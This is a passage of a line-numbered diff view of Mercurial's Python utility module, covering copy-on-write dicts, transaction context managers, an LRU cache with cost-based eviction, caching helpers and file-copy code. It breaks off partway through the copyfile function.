1147 >>> b is a
1149 >>> b is a
1148 True
1150 True
1149 >>> c = b.copy()
1151 >>> c = b.copy()
1150 >>> c is a
1152 >>> c is a
1151 True
1153 True
1152 >>> a = a.preparewrite()
1154 >>> a = a.preparewrite()
1153 >>> b is a
1155 >>> b is a
1154 False
1156 False
1155 >>> a is a.preparewrite()
1157 >>> a is a.preparewrite()
1156 True
1158 True
1157 >>> c = c.preparewrite()
1159 >>> c = c.preparewrite()
1158 >>> b is c
1160 >>> b is c
1159 False
1161 False
1160 >>> b is b.preparewrite()
1162 >>> b is b.preparewrite()
1161 True
1163 True
1162 """
1164 """
1163
1165
1164 class cowsortdict(cow, sortdict):
1166 class cowsortdict(cow, sortdict):
1165 """copy-on-write sortdict
1167 """copy-on-write sortdict
1166
1168
1167 Be sure to call d = d.preparewrite() before writing to d.
1169 Be sure to call d = d.preparewrite() before writing to d.
1168 """
1170 """
1169
1171
1170 class transactional(object):
1172 class transactional(object):
1171 """Base class for making a transactional type into a context manager."""
1173 """Base class for making a transactional type into a context manager."""
1172 __metaclass__ = abc.ABCMeta
1174 __metaclass__ = abc.ABCMeta
1173
1175
1174 @abc.abstractmethod
1176 @abc.abstractmethod
1175 def close(self):
1177 def close(self):
1176 """Successfully closes the transaction."""
1178 """Successfully closes the transaction."""
1177
1179
1178 @abc.abstractmethod
1180 @abc.abstractmethod
1179 def release(self):
1181 def release(self):
1180 """Marks the end of the transaction.
1182 """Marks the end of the transaction.
1181
1183
1182 If the transaction has not been closed, it will be aborted.
1184 If the transaction has not been closed, it will be aborted.
1183 """
1185 """
1184
1186
1185 def __enter__(self):
1187 def __enter__(self):
1186 return self
1188 return self
1187
1189
1188 def __exit__(self, exc_type, exc_val, exc_tb):
1190 def __exit__(self, exc_type, exc_val, exc_tb):
1189 try:
1191 try:
1190 if exc_type is None:
1192 if exc_type is None:
1191 self.close()
1193 self.close()
1192 finally:
1194 finally:
1193 self.release()
1195 self.release()
1194
1196
1195 @contextlib.contextmanager
1197 @contextlib.contextmanager
1196 def acceptintervention(tr=None):
1198 def acceptintervention(tr=None):
1197 """A context manager that closes the transaction on InterventionRequired
1199 """A context manager that closes the transaction on InterventionRequired
1198
1200
1199 If no transaction was provided, this simply runs the body and returns
1201 If no transaction was provided, this simply runs the body and returns
1200 """
1202 """
1201 if not tr:
1203 if not tr:
1202 yield
1204 yield
1203 return
1205 return
1204 try:
1206 try:
1205 yield
1207 yield
1206 tr.close()
1208 tr.close()
1207 except error.InterventionRequired:
1209 except error.InterventionRequired:
1208 tr.close()
1210 tr.close()
1209 raise
1211 raise
1210 finally:
1212 finally:
1211 tr.release()
1213 tr.release()
1212
1214
1213 @contextlib.contextmanager
1215 @contextlib.contextmanager
1214 def nullcontextmanager():
1216 def nullcontextmanager():
1215 yield
1217 yield
1216
1218
1217 class _lrucachenode(object):
1219 class _lrucachenode(object):
1218 """A node in a doubly linked list.
1220 """A node in a doubly linked list.
1219
1221
1220 Holds a reference to nodes on either side as well as a key-value
1222 Holds a reference to nodes on either side as well as a key-value
1221 pair for the dictionary entry.
1223 pair for the dictionary entry.
1222 """
1224 """
1223 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1224
1226
1225 def __init__(self):
1227 def __init__(self):
1226 self.next = None
1228 self.next = None
1227 self.prev = None
1229 self.prev = None
1228
1230
1229 self.key = _notset
1231 self.key = _notset
1230 self.value = None
1232 self.value = None
1231 self.cost = 0
1233 self.cost = 0
1232
1234
1233 def markempty(self):
1235 def markempty(self):
1234 """Mark the node as emptied."""
1236 """Mark the node as emptied."""
1235 self.key = _notset
1237 self.key = _notset
1236 self.value = None
1238 self.value = None
1237 self.cost = 0
1239 self.cost = 0
1238
1240
1239 class lrucachedict(object):
1241 class lrucachedict(object):
1240 """Dict that caches most recent accesses and sets.
1242 """Dict that caches most recent accesses and sets.
1241
1243
1242 The dict consists of an actual backing dict - indexed by original
1244 The dict consists of an actual backing dict - indexed by original
1243 key - and a doubly linked circular list defining the order of entries in
1245 key - and a doubly linked circular list defining the order of entries in
1244 the cache.
1246 the cache.
1245
1247
1246 The head node is the newest entry in the cache. If the cache is full,
1248 The head node is the newest entry in the cache. If the cache is full,
1247 we recycle head.prev and make it the new head. Cache accesses result in
1249 we recycle head.prev and make it the new head. Cache accesses result in
1248 the node being moved to before the existing head and being marked as the
1250 the node being moved to before the existing head and being marked as the
1249 new head node.
1251 new head node.
1250
1252
1251 Items in the cache can be inserted with an optional "cost" value. This is
1253 Items in the cache can be inserted with an optional "cost" value. This is
1252 simply an integer that is specified by the caller. The cache can be queried
1254 simply an integer that is specified by the caller. The cache can be queried
1253 for the total cost of all items presently in the cache.
1255 for the total cost of all items presently in the cache.
1254
1256
1255 The cache can also define a maximum cost. If a cache insertion would
1257 The cache can also define a maximum cost. If a cache insertion would
1256 cause the total cost of the cache to go beyond the maximum cost limit,
1258 cause the total cost of the cache to go beyond the maximum cost limit,
1257 nodes will be evicted to make room for the new code. This can be used
1259 nodes will be evicted to make room for the new code. This can be used
1258 to e.g. set a max memory limit and associate an estimated bytes size
1260 to e.g. set a max memory limit and associate an estimated bytes size
1259 cost to each item in the cache. By default, no maximum cost is enforced.
1261 cost to each item in the cache. By default, no maximum cost is enforced.
1260 """
1262 """
1261 def __init__(self, max, maxcost=0):
1263 def __init__(self, max, maxcost=0):
1262 self._cache = {}
1264 self._cache = {}
1263
1265
1264 self._head = head = _lrucachenode()
1266 self._head = head = _lrucachenode()
1265 head.prev = head
1267 head.prev = head
1266 head.next = head
1268 head.next = head
1267 self._size = 1
1269 self._size = 1
1268 self.capacity = max
1270 self.capacity = max
1269 self.totalcost = 0
1271 self.totalcost = 0
1270 self.maxcost = maxcost
1272 self.maxcost = maxcost
1271
1273
1272 def __len__(self):
1274 def __len__(self):
1273 return len(self._cache)
1275 return len(self._cache)
1274
1276
1275 def __contains__(self, k):
1277 def __contains__(self, k):
1276 return k in self._cache
1278 return k in self._cache
1277
1279
1278 def __iter__(self):
1280 def __iter__(self):
1279 # We don't have to iterate in cache order, but why not.
1281 # We don't have to iterate in cache order, but why not.
1280 n = self._head
1282 n = self._head
1281 for i in range(len(self._cache)):
1283 for i in range(len(self._cache)):
1282 yield n.key
1284 yield n.key
1283 n = n.next
1285 n = n.next
1284
1286
1285 def __getitem__(self, k):
1287 def __getitem__(self, k):
1286 node = self._cache[k]
1288 node = self._cache[k]
1287 self._movetohead(node)
1289 self._movetohead(node)
1288 return node.value
1290 return node.value
1289
1291
1290 def insert(self, k, v, cost=0):
1292 def insert(self, k, v, cost=0):
1291 """Insert a new item in the cache with optional cost value."""
1293 """Insert a new item in the cache with optional cost value."""
1292 node = self._cache.get(k)
1294 node = self._cache.get(k)
1293 # Replace existing value and mark as newest.
1295 # Replace existing value and mark as newest.
1294 if node is not None:
1296 if node is not None:
1295 self.totalcost -= node.cost
1297 self.totalcost -= node.cost
1296 node.value = v
1298 node.value = v
1297 node.cost = cost
1299 node.cost = cost
1298 self.totalcost += cost
1300 self.totalcost += cost
1299 self._movetohead(node)
1301 self._movetohead(node)
1300
1302
1301 if self.maxcost:
1303 if self.maxcost:
1302 self._enforcecostlimit()
1304 self._enforcecostlimit()
1303
1305
1304 return
1306 return
1305
1307
1306 if self._size < self.capacity:
1308 if self._size < self.capacity:
1307 node = self._addcapacity()
1309 node = self._addcapacity()
1308 else:
1310 else:
1309 # Grab the last/oldest item.
1311 # Grab the last/oldest item.
1310 node = self._head.prev
1312 node = self._head.prev
1311
1313
1312 # At capacity. Kill the old entry.
1314 # At capacity. Kill the old entry.
1313 if node.key is not _notset:
1315 if node.key is not _notset:
1314 self.totalcost -= node.cost
1316 self.totalcost -= node.cost
1315 del self._cache[node.key]
1317 del self._cache[node.key]
1316
1318
1317 node.key = k
1319 node.key = k
1318 node.value = v
1320 node.value = v
1319 node.cost = cost
1321 node.cost = cost
1320 self.totalcost += cost
1322 self.totalcost += cost
1321 self._cache[k] = node
1323 self._cache[k] = node
1322 # And mark it as newest entry. No need to adjust order since it
1324 # And mark it as newest entry. No need to adjust order since it
1323 # is already self._head.prev.
1325 # is already self._head.prev.
1324 self._head = node
1326 self._head = node
1325
1327
1326 if self.maxcost:
1328 if self.maxcost:
1327 self._enforcecostlimit()
1329 self._enforcecostlimit()
1328
1330
1329 def __setitem__(self, k, v):
1331 def __setitem__(self, k, v):
1330 self.insert(k, v)
1332 self.insert(k, v)
1331
1333
1332 def __delitem__(self, k):
1334 def __delitem__(self, k):
1333 self.pop(k)
1335 self.pop(k)
1334
1336
1335 def pop(self, k, default=_notset):
1337 def pop(self, k, default=_notset):
1336 try:
1338 try:
1337 node = self._cache.pop(k)
1339 node = self._cache.pop(k)
1338 except KeyError:
1340 except KeyError:
1339 if default is _notset:
1341 if default is _notset:
1340 raise
1342 raise
1341 return default
1343 return default
1342 value = node.value
1344 value = node.value
1343 self.totalcost -= node.cost
1345 self.totalcost -= node.cost
1344 node.markempty()
1346 node.markempty()
1345
1347
1346 # Temporarily mark as newest item before re-adjusting head to make
1348 # Temporarily mark as newest item before re-adjusting head to make
1347 # this node the oldest item.
1349 # this node the oldest item.
1348 self._movetohead(node)
1350 self._movetohead(node)
1349 self._head = node.next
1351 self._head = node.next
1350
1352
1351 return value
1353 return value
1352
1354
1353 # Additional dict methods.
1355 # Additional dict methods.
1354
1356
1355 def get(self, k, default=None):
1357 def get(self, k, default=None):
1356 try:
1358 try:
1357 return self.__getitem__(k)
1359 return self.__getitem__(k)
1358 except KeyError:
1360 except KeyError:
1359 return default
1361 return default
1360
1362
1361 def peek(self, k, default=_notset):
1363 def peek(self, k, default=_notset):
1362 """Get the specified item without moving it to the head
1364 """Get the specified item without moving it to the head
1363
1365
1364 Unlike get(), this doesn't mutate the internal state. But be aware
1366 Unlike get(), this doesn't mutate the internal state. But be aware
1365 that it doesn't mean peek() is thread safe.
1367 that it doesn't mean peek() is thread safe.
1366 """
1368 """
1367 try:
1369 try:
1368 node = self._cache[k]
1370 node = self._cache[k]
1369 return node.value
1371 return node.value
1370 except KeyError:
1372 except KeyError:
1371 if default is _notset:
1373 if default is _notset:
1372 raise
1374 raise
1373 return default
1375 return default
1374
1376
1375 def clear(self):
1377 def clear(self):
1376 n = self._head
1378 n = self._head
1377 while n.key is not _notset:
1379 while n.key is not _notset:
1378 self.totalcost -= n.cost
1380 self.totalcost -= n.cost
1379 n.markempty()
1381 n.markempty()
1380 n = n.next
1382 n = n.next
1381
1383
1382 self._cache.clear()
1384 self._cache.clear()
1383
1385
1384 def copy(self, capacity=None, maxcost=0):
1386 def copy(self, capacity=None, maxcost=0):
1385 """Create a new cache as a copy of the current one.
1387 """Create a new cache as a copy of the current one.
1386
1388
1387 By default, the new cache has the same capacity as the existing one.
1389 By default, the new cache has the same capacity as the existing one.
1388 But, the cache capacity can be changed as part of performing the
1390 But, the cache capacity can be changed as part of performing the
1389 copy.
1391 copy.
1390
1392
1391 Items in the copy have an insertion/access order matching this
1393 Items in the copy have an insertion/access order matching this
1392 instance.
1394 instance.
1393 """
1395 """
1394
1396
1395 capacity = capacity or self.capacity
1397 capacity = capacity or self.capacity
1396 maxcost = maxcost or self.maxcost
1398 maxcost = maxcost or self.maxcost
1397 result = lrucachedict(capacity, maxcost=maxcost)
1399 result = lrucachedict(capacity, maxcost=maxcost)
1398
1400
1399 # We copy entries by iterating in oldest-to-newest order so the copy
1401 # We copy entries by iterating in oldest-to-newest order so the copy
1400 # has the correct ordering.
1402 # has the correct ordering.
1401
1403
1402 # Find the first non-empty entry.
1404 # Find the first non-empty entry.
1403 n = self._head.prev
1405 n = self._head.prev
1404 while n.key is _notset and n is not self._head:
1406 while n.key is _notset and n is not self._head:
1405 n = n.prev
1407 n = n.prev
1406
1408
1407 # We could potentially skip the first N items when decreasing capacity.
1409 # We could potentially skip the first N items when decreasing capacity.
1408 # But let's keep it simple unless it is a performance problem.
1410 # But let's keep it simple unless it is a performance problem.
1409 for i in range(len(self._cache)):
1411 for i in range(len(self._cache)):
1410 result.insert(n.key, n.value, cost=n.cost)
1412 result.insert(n.key, n.value, cost=n.cost)
1411 n = n.prev
1413 n = n.prev
1412
1414
1413 return result
1415 return result
1414
1416
1415 def popoldest(self):
1417 def popoldest(self):
1416 """Remove the oldest item from the cache.
1418 """Remove the oldest item from the cache.
1417
1419
1418 Returns the (key, value) describing the removed cache entry.
1420 Returns the (key, value) describing the removed cache entry.
1419 """
1421 """
1420 if not self._cache:
1422 if not self._cache:
1421 return
1423 return
1422
1424
1423 # Walk the linked list backwards starting at tail node until we hit
1425 # Walk the linked list backwards starting at tail node until we hit
1424 # a non-empty node.
1426 # a non-empty node.
1425 n = self._head.prev
1427 n = self._head.prev
1426 while n.key is _notset:
1428 while n.key is _notset:
1427 n = n.prev
1429 n = n.prev
1428
1430
1429 key, value = n.key, n.value
1431 key, value = n.key, n.value
1430
1432
1431 # And remove it from the cache and mark it as empty.
1433 # And remove it from the cache and mark it as empty.
1432 del self._cache[n.key]
1434 del self._cache[n.key]
1433 self.totalcost -= n.cost
1435 self.totalcost -= n.cost
1434 n.markempty()
1436 n.markempty()
1435
1437
1436 return key, value
1438 return key, value
1437
1439
1438 def _movetohead(self, node):
1440 def _movetohead(self, node):
1439 """Mark a node as the newest, making it the new head.
1441 """Mark a node as the newest, making it the new head.
1440
1442
1441 When a node is accessed, it becomes the freshest entry in the LRU
1443 When a node is accessed, it becomes the freshest entry in the LRU
1442 list, which is denoted by self._head.
1444 list, which is denoted by self._head.
1443
1445
1444 Visually, let's make ``N`` the new head node (* denotes head):
1446 Visually, let's make ``N`` the new head node (* denotes head):
1445
1447
1446 previous/oldest <-> head <-> next/next newest
1448 previous/oldest <-> head <-> next/next newest
1447
1449
1448 ----<->--- A* ---<->-----
1450 ----<->--- A* ---<->-----
1449 | |
1451 | |
1450 E <-> D <-> N <-> C <-> B
1452 E <-> D <-> N <-> C <-> B
1451
1453
1452 To:
1454 To:
1453
1455
1454 ----<->--- N* ---<->-----
1456 ----<->--- N* ---<->-----
1455 | |
1457 | |
1456 E <-> D <-> C <-> B <-> A
1458 E <-> D <-> C <-> B <-> A
1457
1459
1458 This requires the following moves:
1460 This requires the following moves:
1459
1461
1460 C.next = D (node.prev.next = node.next)
1462 C.next = D (node.prev.next = node.next)
1461 D.prev = C (node.next.prev = node.prev)
1463 D.prev = C (node.next.prev = node.prev)
1462 E.next = N (head.prev.next = node)
1464 E.next = N (head.prev.next = node)
1463 N.prev = E (node.prev = head.prev)
1465 N.prev = E (node.prev = head.prev)
1464 N.next = A (node.next = head)
1466 N.next = A (node.next = head)
1465 A.prev = N (head.prev = node)
1467 A.prev = N (head.prev = node)
1466 """
1468 """
1467 head = self._head
1469 head = self._head
1468 # C.next = D
1470 # C.next = D
1469 node.prev.next = node.next
1471 node.prev.next = node.next
1470 # D.prev = C
1472 # D.prev = C
1471 node.next.prev = node.prev
1473 node.next.prev = node.prev
1472 # N.prev = E
1474 # N.prev = E
1473 node.prev = head.prev
1475 node.prev = head.prev
1474 # N.next = A
1476 # N.next = A
1475 # It is tempting to do just "head" here, however if node is
1477 # It is tempting to do just "head" here, however if node is
1476 # adjacent to head, this will do bad things.
1478 # adjacent to head, this will do bad things.
1477 node.next = head.prev.next
1479 node.next = head.prev.next
1478 # E.next = N
1480 # E.next = N
1479 node.next.prev = node
1481 node.next.prev = node
1480 # A.prev = N
1482 # A.prev = N
1481 node.prev.next = node
1483 node.prev.next = node
1482
1484
1483 self._head = node
1485 self._head = node
1484
1486
1485 def _addcapacity(self):
1487 def _addcapacity(self):
1486 """Add a node to the circular linked list.
1488 """Add a node to the circular linked list.
1487
1489
1488 The new node is inserted before the head node.
1490 The new node is inserted before the head node.
1489 """
1491 """
1490 head = self._head
1492 head = self._head
1491 node = _lrucachenode()
1493 node = _lrucachenode()
1492 head.prev.next = node
1494 head.prev.next = node
1493 node.prev = head.prev
1495 node.prev = head.prev
1494 node.next = head
1496 node.next = head
1495 head.prev = node
1497 head.prev = node
1496 self._size += 1
1498 self._size += 1
1497 return node
1499 return node
1498
1500
1499 def _enforcecostlimit(self):
1501 def _enforcecostlimit(self):
1500 # This should run after an insertion. It should only be called if total
1502 # This should run after an insertion. It should only be called if total
1501 # cost limits are being enforced.
1503 # cost limits are being enforced.
1502 # The most recently inserted node is never evicted.
1504 # The most recently inserted node is never evicted.
1503 if len(self) <= 1 or self.totalcost <= self.maxcost:
1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1504 return
1506 return
1505
1507
1506 # This is logically equivalent to calling popoldest() until we
1508 # This is logically equivalent to calling popoldest() until we
1507 # free up enough cost. We don't do that since popoldest() needs
1509 # free up enough cost. We don't do that since popoldest() needs
1508 # to walk the linked list and doing this in a loop would be
1510 # to walk the linked list and doing this in a loop would be
1509 # quadratic. So we find the first non-empty node and then
1511 # quadratic. So we find the first non-empty node and then
1510 # walk nodes until we free up enough capacity.
1512 # walk nodes until we free up enough capacity.
1511 #
1513 #
1512 # If we only removed the minimum number of nodes to free enough
1514 # If we only removed the minimum number of nodes to free enough
1513 # cost at insert time, chances are high that the next insert would
1515 # cost at insert time, chances are high that the next insert would
1514 # also require pruning. This would effectively constitute quadratic
1516 # also require pruning. This would effectively constitute quadratic
1515 # behavior for insert-heavy workloads. To mitigate this, we set a
1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1516 # target cost that is a percentage of the max cost. This will tend
1518 # target cost that is a percentage of the max cost. This will tend
1517 # to free more nodes when the high water mark is reached, which
1519 # to free more nodes when the high water mark is reached, which
1518 # lowers the chances of needing to prune on the subsequent insert.
1520 # lowers the chances of needing to prune on the subsequent insert.
1519 targetcost = int(self.maxcost * 0.75)
1521 targetcost = int(self.maxcost * 0.75)
1520
1522
1521 n = self._head.prev
1523 n = self._head.prev
1522 while n.key is _notset:
1524 while n.key is _notset:
1523 n = n.prev
1525 n = n.prev
1524
1526
1525 while len(self) > 1 and self.totalcost > targetcost:
1527 while len(self) > 1 and self.totalcost > targetcost:
1526 del self._cache[n.key]
1528 del self._cache[n.key]
1527 self.totalcost -= n.cost
1529 self.totalcost -= n.cost
1528 n.markempty()
1530 n.markempty()
1529 n = n.prev
1531 n = n.prev
1530
1532
1531 def lrucachefunc(func):
1533 def lrucachefunc(func):
1532 '''cache most recent results of function calls'''
1534 '''cache most recent results of function calls'''
1533 cache = {}
1535 cache = {}
1534 order = collections.deque()
1536 order = collections.deque()
1535 if func.__code__.co_argcount == 1:
1537 if func.__code__.co_argcount == 1:
1536 def f(arg):
1538 def f(arg):
1537 if arg not in cache:
1539 if arg not in cache:
1538 if len(cache) > 20:
1540 if len(cache) > 20:
1539 del cache[order.popleft()]
1541 del cache[order.popleft()]
1540 cache[arg] = func(arg)
1542 cache[arg] = func(arg)
1541 else:
1543 else:
1542 order.remove(arg)
1544 order.remove(arg)
1543 order.append(arg)
1545 order.append(arg)
1544 return cache[arg]
1546 return cache[arg]
1545 else:
1547 else:
1546 def f(*args):
1548 def f(*args):
1547 if args not in cache:
1549 if args not in cache:
1548 if len(cache) > 20:
1550 if len(cache) > 20:
1549 del cache[order.popleft()]
1551 del cache[order.popleft()]
1550 cache[args] = func(*args)
1552 cache[args] = func(*args)
1551 else:
1553 else:
1552 order.remove(args)
1554 order.remove(args)
1553 order.append(args)
1555 order.append(args)
1554 return cache[args]
1556 return cache[args]
1555
1557
1556 return f
1558 return f
1557
1559
1558 class propertycache(object):
1560 class propertycache(object):
1559 def __init__(self, func):
1561 def __init__(self, func):
1560 self.func = func
1562 self.func = func
1561 self.name = func.__name__
1563 self.name = func.__name__
1562 def __get__(self, obj, type=None):
1564 def __get__(self, obj, type=None):
1563 result = self.func(obj)
1565 result = self.func(obj)
1564 self.cachevalue(obj, result)
1566 self.cachevalue(obj, result)
1565 return result
1567 return result
1566
1568
1567 def cachevalue(self, obj, value):
1569 def cachevalue(self, obj, value):
1568 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1569 obj.__dict__[self.name] = value
1571 obj.__dict__[self.name] = value
1570
1572
1571 def clearcachedproperty(obj, prop):
1573 def clearcachedproperty(obj, prop):
1572 '''clear a cached property value, if one has been set'''
1574 '''clear a cached property value, if one has been set'''
1573 prop = pycompat.sysstr(prop)
1575 prop = pycompat.sysstr(prop)
1574 if prop in obj.__dict__:
1576 if prop in obj.__dict__:
1575 del obj.__dict__[prop]
1577 del obj.__dict__[prop]
1576
1578
1577 def increasingchunks(source, min=1024, max=65536):
1579 def increasingchunks(source, min=1024, max=65536):
1578 '''return no less than min bytes per chunk while data remains,
1580 '''return no less than min bytes per chunk while data remains,
1579 doubling min after each chunk until it reaches max'''
1581 doubling min after each chunk until it reaches max'''
1580 def log2(x):
1582 def log2(x):
1581 if not x:
1583 if not x:
1582 return 0
1584 return 0
1583 i = 0
1585 i = 0
1584 while x:
1586 while x:
1585 x >>= 1
1587 x >>= 1
1586 i += 1
1588 i += 1
1587 return i - 1
1589 return i - 1
1588
1590
1589 buf = []
1591 buf = []
1590 blen = 0
1592 blen = 0
1591 for chunk in source:
1593 for chunk in source:
1592 buf.append(chunk)
1594 buf.append(chunk)
1593 blen += len(chunk)
1595 blen += len(chunk)
1594 if blen >= min:
1596 if blen >= min:
1595 if min < max:
1597 if min < max:
1596 min = min << 1
1598 min = min << 1
1597 nmin = 1 << log2(blen)
1599 nmin = 1 << log2(blen)
1598 if nmin > min:
1600 if nmin > min:
1599 min = nmin
1601 min = nmin
1600 if min > max:
1602 if min > max:
1601 min = max
1603 min = max
1602 yield ''.join(buf)
1604 yield ''.join(buf)
1603 blen = 0
1605 blen = 0
1604 buf = []
1606 buf = []
1605 if buf:
1607 if buf:
1606 yield ''.join(buf)
1608 yield ''.join(buf)
1607
1609
1608 def always(fn):
1610 def always(fn):
1609 return True
1611 return True
1610
1612
1611 def never(fn):
1613 def never(fn):
1612 return False
1614 return False
1613
1615
1614 def nogc(func):
1616 def nogc(func):
1615 """disable garbage collector
1617 """disable garbage collector
1616
1618
1617 Python's garbage collector triggers a GC each time a certain number of
1619 Python's garbage collector triggers a GC each time a certain number of
1618 container objects (the number being defined by gc.get_threshold()) are
1620 container objects (the number being defined by gc.get_threshold()) are
1619 allocated even when marked not to be tracked by the collector. Tracking has
1621 allocated even when marked not to be tracked by the collector. Tracking has
1620 no effect on when GCs are triggered, only on what objects the GC looks
1622 no effect on when GCs are triggered, only on what objects the GC looks
1621 into. As a workaround, disable GC while building complex (huge)
1623 into. As a workaround, disable GC while building complex (huge)
1622 containers.
1624 containers.
1623
1625
1624 This garbage collector issue have been fixed in 2.7. But it still affect
1626 This garbage collector issue have been fixed in 2.7. But it still affect
1625 CPython's performance.
1627 CPython's performance.
1626 """
1628 """
1627 def wrapper(*args, **kwargs):
1629 def wrapper(*args, **kwargs):
1628 gcenabled = gc.isenabled()
1630 gcenabled = gc.isenabled()
1629 gc.disable()
1631 gc.disable()
1630 try:
1632 try:
1631 return func(*args, **kwargs)
1633 return func(*args, **kwargs)
1632 finally:
1634 finally:
1633 if gcenabled:
1635 if gcenabled:
1634 gc.enable()
1636 gc.enable()
1635 return wrapper
1637 return wrapper
1636
1638
1637 if pycompat.ispypy:
1639 if pycompat.ispypy:
1638 # PyPy runs slower with gc disabled
1640 # PyPy runs slower with gc disabled
1639 nogc = lambda x: x
1641 nogc = lambda x: x
1640
1642
1641 def pathto(root, n1, n2):
1643 def pathto(root, n1, n2):
1642 '''return the relative path from one place to another.
1644 '''return the relative path from one place to another.
1643 root should use os.sep to separate directories
1645 root should use os.sep to separate directories
1644 n1 should use os.sep to separate directories
1646 n1 should use os.sep to separate directories
1645 n2 should use "/" to separate directories
1647 n2 should use "/" to separate directories
1646 returns an os.sep-separated path.
1648 returns an os.sep-separated path.
1647
1649
1648 If n1 is a relative path, it's assumed it's
1650 If n1 is a relative path, it's assumed it's
1649 relative to root.
1651 relative to root.
1650 n2 should always be relative to root.
1652 n2 should always be relative to root.
1651 '''
1653 '''
1652 if not n1:
1654 if not n1:
1653 return localpath(n2)
1655 return localpath(n2)
1654 if os.path.isabs(n1):
1656 if os.path.isabs(n1):
1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 return os.path.join(root, localpath(n2))
1658 return os.path.join(root, localpath(n2))
1657 n2 = '/'.join((pconvert(root), n2))
1659 n2 = '/'.join((pconvert(root), n2))
1658 a, b = splitpath(n1), n2.split('/')
1660 a, b = splitpath(n1), n2.split('/')
1659 a.reverse()
1661 a.reverse()
1660 b.reverse()
1662 b.reverse()
1661 while a and b and a[-1] == b[-1]:
1663 while a and b and a[-1] == b[-1]:
1662 a.pop()
1664 a.pop()
1663 b.pop()
1665 b.pop()
1664 b.reverse()
1666 b.reverse()
1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666
1668
1667 # the location of data files matching the source code
1669 # the location of data files matching the source code
1668 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1669 # executable version (py2exe) doesn't support __file__
1671 # executable version (py2exe) doesn't support __file__
1670 datapath = os.path.dirname(pycompat.sysexecutable)
1672 datapath = os.path.dirname(pycompat.sysexecutable)
1671 else:
1673 else:
1672 datapath = os.path.dirname(pycompat.fsencode(__file__))
1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1673
1675
1674 i18n.setdatapath(datapath)
1676 i18n.setdatapath(datapath)
1675
1677
1676 def checksignature(func):
1678 def checksignature(func):
1677 '''wrap a function with code to check for calling errors'''
1679 '''wrap a function with code to check for calling errors'''
1678 def check(*args, **kwargs):
1680 def check(*args, **kwargs):
1679 try:
1681 try:
1680 return func(*args, **kwargs)
1682 return func(*args, **kwargs)
1681 except TypeError:
1683 except TypeError:
1682 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1683 raise error.SignatureError
1685 raise error.SignatureError
1684 raise
1686 raise
1685
1687
1686 return check
1688 return check
1687
1689
1688 # a whilelist of known filesystems where hardlink works reliably
1690 # a whilelist of known filesystems where hardlink works reliably
1689 _hardlinkfswhitelist = {
1691 _hardlinkfswhitelist = {
1690 'apfs',
1692 'apfs',
1691 'btrfs',
1693 'btrfs',
1692 'ext2',
1694 'ext2',
1693 'ext3',
1695 'ext3',
1694 'ext4',
1696 'ext4',
1695 'hfs',
1697 'hfs',
1696 'jfs',
1698 'jfs',
1697 'NTFS',
1699 'NTFS',
1698 'reiserfs',
1700 'reiserfs',
1699 'tmpfs',
1701 'tmpfs',
1700 'ufs',
1702 'ufs',
1701 'xfs',
1703 'xfs',
1702 'zfs',
1704 'zfs',
1703 }
1705 }
1704
1706
1705 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1706 '''copy a file, preserving mode and optionally other stat info like
1708 '''copy a file, preserving mode and optionally other stat info like
1707 atime/mtime
1709 atime/mtime
1708
1710
1709 checkambig argument is used with filestat, and is useful only if
1711 checkambig argument is used with filestat, and is useful only if
1710 destination file is guarded by any lock (e.g. repo.lock or
1712 destination file is guarded by any lock (e.g. repo.lock or
1711 repo.wlock).
1713 repo.wlock).
1712
1714
1713 copystat and checkambig should be exclusive.
1715 copystat and checkambig should be exclusive.
1714 '''
1716 '''
1715 assert not (copystat and checkambig)
1717 assert not (copystat and checkambig)
1716 oldstat = None
1718 oldstat = None
1717 if os.path.lexists(dest):
1719 if os.path.lexists(dest):
1718 if checkambig:
1720 if checkambig:
1719 oldstat = checkambig and filestat.frompath(dest)
1721 oldstat = checkambig and filestat.frompath(dest)
1720 unlink(dest)
1722 unlink(dest)
1721 if hardlink:
1723 if hardlink:
1722 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1723 # unless we are confident that dest is on a whitelisted filesystem.
1725 # unless we are confident that dest is on a whitelisted filesystem.
1724 try:
1726 try:
1725 fstype = getfstype(os.path.dirname(dest))
1727 fstype = getfstype(os.path.dirname(dest))
1726 except OSError:
1728 except OSError:
1727 fstype = None
1729 fstype = None
1728 if fstype not in _hardlinkfswhitelist:
1730 if fstype not in _hardlinkfswhitelist:
1729 hardlink = False
1731 hardlink = False
1730 if hardlink:
1732 if hardlink:
1731 try:
1733 try:
1732 oslink(src, dest)
1734 oslink(src, dest)
1733 return
1735 return
1734 except (IOError, OSError):
1736 except (IOError, OSError):
1735 pass # fall back to normal copy
1737 pass # fall back to normal copy
1736 if os.path.islink(src):
1738 if os.path.islink(src):
1737 os.symlink(os.readlink(src), dest)
1739 os.symlink(os.readlink(src), dest)
1738 # copytime is ignored for symlinks, but in general copytime isn't needed
1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1739 # for them anyway
1741 # for them anyway
1740 else:
1742 else:
1741 try:
1743 try:
1742 shutil.copyfile(src, dest)
1744 shutil.copyfile(src, dest)
1743 if copystat:
1745 if copystat:
1744 # copystat also copies mode
1746 # copystat also copies mode
1745 shutil.copystat(src, dest)
1747 shutil.copystat(src, dest)
1746 else:
1748 else:
1747 shutil.copymode(src, dest)
1749 shutil.copymode(src, dest)
1748 if oldstat and oldstat.stat:
1750 if oldstat and oldstat.stat:
1749 newstat = filestat.frompath(dest)
1751 newstat = filestat.frompath(dest)
1750 if newstat.isambig(oldstat):
1752 if newstat.isambig(oldstat):
